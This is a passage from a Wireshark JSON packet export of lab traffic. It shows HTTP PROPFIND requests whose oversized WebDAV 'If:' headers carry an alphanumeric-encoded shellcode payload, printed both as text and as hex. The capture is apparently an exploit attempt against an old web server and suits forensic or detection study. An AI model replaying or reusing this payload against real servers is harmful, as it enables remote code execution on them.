:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/afgAiOeZtiFkAuPsxFtNGTYteLBSCnzOoocnXvZefSBVMqYOtNXtpFLlaIfFyJoZhwztMPWpnDvZpQZzOMzSCast<73><74><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/IAETQhXCDNQflvuNKArvrZyPMUhGEUbQCphBNAVHsMfyjwlwsAqpPqgXsnmIdqeKTWcTAeeuhONQRQMfwkbYlxlJ<6C><4A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "363"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.808796000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.808796000",
|
||
"frame.time_delta": "0.000051000",
|
||
"frame.time_delta_displayed": "0.004142000",
|
||
"frame.time_relative": "17.059736000",
|
||
"frame.number": "370",
|
||
"frame.len": "303",
|
||
"frame.cap_len": "303",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "289",
|
||
"ip.id": "0x0000b8d0",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000779f",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46135",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46135",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "59",
|
||
"tcp.len": "237",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2890364243",
|
||
"tcp.nxtseq": "1686",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2864957567",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000d91d",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:48:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:48:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868616",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000448000",
|
||
"tcp.analysis.bytes_in_flight": "1685",
|
||
"tcp.analysis.push_bytes_sent": "1685"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000636000",
|
||
"tcp.time_delta": "0.000051000"
|
||
},
|
||
"tcp.payload": "30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "369",
|
||
"tcp.segment": "370",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1685",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:69:61:67:71:78:42:6a:6d:42:51:67:65:58:41:59:49:4f:76:50:58:79:6b:7a:76:46:48:54:44:4d:4c:6c:50:63:76:73:78:6c:52:52:70:51:75:7a:70:48:42:68:63:62:41:71:59:64:67:51:75:42:5a:66:6b:6b:65:45:55:58:71:54:78:5a:73:4e:78:7a:45:52:51:64:65:4c:62:59:56:46:4a:4f:7a:42:e7:85:b0:e5:81:b4:e6:a9:8b:e5:81:b1:e6:99:b4:e5:89:b8:e6:95:89:e7:a9:89:e4:ad:9a:e5:8d:a1:e7:8d:82:e4:8d:a2:e5:a1:99:e7:81:86:e4:91:82:e4:a9:b8:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:9d:a4:e7:a5:92:e7:a1:b4:e5:99:84:e6:a9:b0:e7:89:8b:e6:8d:b6:e4:89:b7:e4:85:8d:e6:b1:97:e6:9d:aa:e7:a1:8b:e5:91:b8:e6:a9:b5:e4:99:ad:e6:89:a9:e6:9d:9a:e6:b1:86:e4:bd:a1:e4:99:95:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:61:42:4d:53:50:7a:79:69:71:52:4c:73:54:7a:79:66:6b:75:70:61:72:78:4d:71:54:74:44:44:56:43:68:52:58:72:75:61:6a:73:61:67:6f:47:57:4d:4b:65:4d:6f:65:62:6b:50:48:6a:59:4b:41:41:78:57:79:48:50:63:68:72:72:56:4d:64:56:59:53:4b:75:77:59:41:70:47:75:4e:6b:43:73:45:75:e7:99:87:e7:89:99:e6:b1:b6:e5:91:ba:e4:95:b8:e7:a1:83:e6:a9:95:e6:89:86:e6:bd:83:e5:91:b8:e6:89:a1:e7:95:94:e4:b5:b2:e6:85:ad:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:91:82:e4:a1:ae:e5:a9:b5:e5:89:a8:e1:8f:80:e6:a0:83:e7:99:84:e4:ad:89:e4:85:9a:e4:b1:9a:e6:99:89:e4:89:a9:e6:9d:ab:e4:95:89:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
